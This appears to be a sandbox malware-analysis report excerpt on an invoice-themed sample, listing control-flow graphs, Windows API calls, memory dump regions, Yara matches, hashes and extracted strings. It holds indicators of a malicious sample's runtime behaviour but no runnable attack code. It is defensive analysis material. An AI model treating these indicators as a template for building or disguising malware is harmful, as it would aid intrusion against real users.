                                                                                                                                • Instruction ID: 40d23ec928c68e0a6464de0692db4df55425ab7a81bdc084619abc08130514c1
                                                                                                                                • Opcode Fuzzy Hash: e81cfdd2e02e817d9fe2c7f4e791ef6f1392c9bf88ca8f5c69f84ee121075046
                                                                                                                                • Instruction Fuzzy Hash: 8D411FB0D00718CBEB24CFAAC884BDDBBB1FF89704F20806AC409AB251DB756946CF50

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016CD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 703f3a049bf6ea3ec7458f68e37da362b5f346a40cb04f7a2983796b42a10ff5
                                                                                                                                • Instruction ID: 8534f0cf530f0a16392f5e657e181cd02cef64ab51af8d581dc656206f3a4190
                                                                                                                                • Opcode Fuzzy Hash: 703f3a049bf6ea3ec7458f68e37da362b5f346a40cb04f7a2983796b42a10ff5
                                                                                                                                • Instruction Fuzzy Hash: 36319234A403808FF718EF61E8857693BA5FB85750F208169E9529B3D8CBF85DA5CF12

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05A7D4C5,?,?), ref: 05A7D577
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DrawText
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                • Opcode ID: bea7d3e4398c8222f3462ca98e9ccae1382ebee754b5656365d4f80131692661
                                                                                                                                • Instruction ID: 107ecb994ce54010990c17847e579679ebe655c6484910fb43409521d3089d65
                                                                                                                                • Opcode Fuzzy Hash: bea7d3e4398c8222f3462ca98e9ccae1382ebee754b5656365d4f80131692661
                                                                                                                                • Instruction Fuzzy Hash: E031C0B5D002499FDB10CF9AD884ADEFBF4FF58324F24842AE919A7210D774A945CFA0

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05A7D4C5,?,?), ref: 05A7D577
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DrawText
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2175133113-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 173 16cd688-16cd724 DuplicateHandle 174 16cd72d-16cd74a 173->174 175 16cd726-16cd72c 173->175 175->174
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016CD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 178 16cd690-16cd724 DuplicateHandle 179 16cd72d-16cd74a 178->179 180 16cd726-16cd72c 178->180 180->179
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016CD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 183 16caf98-16cafd8 184 16cafda-16cafdd 183->184 185 16cafe0-16cb00b GetModuleHandleW 183->185 184->185 186 16cb00d-16cb013 185->186 187 16cb014-16cb028 185->187 186->187
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016CAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c3a0c409d5447df8cd4f99d4892d373d7470c868d318e49a425d6fd355e9080
                                                                                                                                • Instruction ID: 139d9fac1518df098ee46d802e7dea944fbbd457fb961499013a4719157389fb
                                                                                                                                • Opcode Fuzzy Hash: 9c3a0c409d5447df8cd4f99d4892d373d7470c868d318e49a425d6fd355e9080
                                                                                                                                • Instruction Fuzzy Hash: FC21F1B2504240EFDB45DF94DDC0B2ABF65FB88324F20C569EE090A296C376D416CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d35e0014a78d3eb72dd6642413985e4ff555d21174f90bc4bea1d41e3708f4b1
                                                                                                                                • Instruction ID: 7e93ec54cd4358f7a17aa59e92cf32c7f389c85518860680c98f4ee5c7be007a
                                                                                                                                • Opcode Fuzzy Hash: d35e0014a78d3eb72dd6642413985e4ff555d21174f90bc4bea1d41e3708f4b1
                                                                                                                                • Instruction Fuzzy Hash: 572103B2504244EFDB45DF54D9C0B2ABF65FB88318F20C569ED090B296C336D456CAA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4eabf7bf52bdf4e0e44acde3ddb62821c6aec0d461a457fa2eaec4d726bbc9e8
                                                                                                                                • Instruction ID: a506247d06bce93c05b7e932c25ecdf740ac6a36a9d32f5fb4aef23337de818a
                                                                                                                                • Opcode Fuzzy Hash: 4eabf7bf52bdf4e0e44acde3ddb62821c6aec0d461a457fa2eaec4d726bbc9e8
                                                                                                                                • Instruction Fuzzy Hash: 372134B1604240EFDB05DF94D9C0B26BBADFB88324F24C56DEA8A4B352C376D446CA61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 428d0dae3bb8e0537ffb90aa95554d4aa908a502e6910b4ef64385b2e0e3af26
                                                                                                                                • Instruction ID: ce914a22960cb6dd695477a905337af54c997a76c3923362ba1e058062b24131
                                                                                                                                • Opcode Fuzzy Hash: 428d0dae3bb8e0537ffb90aa95554d4aa908a502e6910b4ef64385b2e0e3af26
                                                                                                                                • Instruction Fuzzy Hash: 1C212275604240EFDB15DF54D9C0B26BB69FB88314F20C56DE98A0B392C37BD847CAA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                                • Instruction ID: 38a419dadc065604ef70ce270052f9cdd8893698e5d6a6cb309d60ce65a55d38
                                                                                                                                • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                                • Instruction Fuzzy Hash: 2E21DFB6404280CFDB06CF44D9C4B16BF72FB84324F24C1A9DD080B296C33AD426CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                • Instruction ID: 06987a99937322827096a883efd024ead80493d1c3f29281ed1810f53942528a
                                                                                                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                • Instruction Fuzzy Hash: 4711AFB6504284DFCB16CF54D9C4B1ABF71FB84318F24C6A9DC490B656C33AD45ACBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction ID: fa7a36b2a0bbb49dfe2c326cd7dcc4c66b63f0c5650fc20c2dd41ee5292d61dd
                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction Fuzzy Hash: 4B11BE75604280CFCB12CF54D9C4B15BB61FB84314F24C6A9D8494B756C33AD40ACB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction ID: 4e1e2980c88aad50c0f7e0bf96ae1b6f5225d4c185b0740db4e7c45aeefc3f0f
                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction Fuzzy Hash: 7A11BBB5604280DFCB12CF54C9C0B15BBA5FB84224F28C6A9D9894B3A6C33AD44ACB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 28c88741dc323c2081d1d731a90a60eb9a7427c23ebd7ee78c73c75fbfe5af35
                                                                                                                                • Instruction ID: 8d2df835d53762f0f0c124e8a9c3d6ca9bf94ebce3c9e95cd38bcec260978794
                                                                                                                                • Opcode Fuzzy Hash: 28c88741dc323c2081d1d731a90a60eb9a7427c23ebd7ee78c73c75fbfe5af35
                                                                                                                                • Instruction Fuzzy Hash: B9012671004380EAF7508FA9CD84B76BF98DF41324F08C52AEE090A2C2D7B99841CAB1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:1.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:4.9%
                                                                                                                                Signature Coverage:7.7%
                                                                                                                                Total number of Nodes:143
                                                                                                                                Total number of Limit Nodes:13

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 89 4177a3-4177cc call 42f3c3 92 4177d2-4177e0 call 42f9c3 89->92 93 4177ce-4177d1 89->93 96 4177f0-417801 call 42dd43 92->96 97 4177e2-4177ed call 42fc63 92->97 102 417803-417817 LdrLoadDll 96->102 103 41781a-41781d 96->103 97->96 102->103
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417815
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 109 42c633-42c66c call 404973 call 42d833 NtClose
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 123 1742b60-1742b6c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 124 1742c70-1742c7c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <
                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 0 413e9c-413ea3 1 413ea5-413ea7 0->1 2 413efb-413f74 0->2 3 413ea9-413eb7 1->3 4 413e9b 1->4 7 413f76-413f87 2->7 8 413faa-413fbe 2->8 3->2 4->0 9 413fc1-413fde 8->9 10 414027-41404d call 424ee3 8->10 13 41406d-414073 10->13 14 41404f-41405e PostThreadMessageW 10->14 14->13 15 414060-41406a 14->15 15->13
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 0-374207719

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 16 413fe3-414020 call 42e763 call 42f173 call 4177a3 23 414027-41404d call 424ee3 16->23 24 414022 call 4048e3 16->24 27 41406d-414073 23->27 28 41404f-41405e PostThreadMessageW 23->28 24->23 28->27 29 414060-41406a 28->29 29->27
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(7-j38IBI,00000111,00000000,00000000), ref: 0041405A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 1836367815-374207719

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 39 42c983-42c9c1 call 404973 call 42d833 RtlFreeHeap
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID: dA
                                                                                                                                • API String ID: 3298025750-3833285433

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 104 42c943-42c981 call 404973 call 42d833 RtlAllocateHeap
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E5CE,?,?,00000000,?,0041E5CE,?,?,?), ref: 0042C97C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 114 42c9c3-42c9fc call 404973 call 42d833 ExitProcess
                                                                                                                                APIs
                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,C9BCB0A8,?,?,C9BCB0A8), ref: 0042C9F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 119 1742c0a-1742c0f 120 1742c11-1742c18 119->120 121 1742c1f-1742c26 LdrInitializeThunk 119->121
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                Strings
                                                                                                                                • Critical section address., xrefs: 01775502
                                                                                                                                • Invalid debug info address of this critical section, xrefs: 017754B6
                                                                                                                                • double initialized or corrupted critical section, xrefs: 01775508
                                                                                                                                • Thread identifier, xrefs: 0177553A
                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754CE
                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0177540A, 01775496, 01775519
                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01775543
                                                                                                                                • undeleted critical section in freed memory, xrefs: 0177542B
                                                                                                                                • 8, xrefs: 017752E3
                                                                                                                                • Critical section address, xrefs: 01775425, 017754BC, 01775534
                                                                                                                                • Address of the debug info found in the active list., xrefs: 017754AE, 017754FA
                                                                                                                                • Critical section debug info address, xrefs: 0177541F, 0177552E
                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754E2
                                                                                                                                • corrupted critical section, xrefs: 017754C2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                Strings
                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01772498
                                                                                                                                • @, xrefs: 0177259B
                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0177261F
                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017725EB
                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017722E4
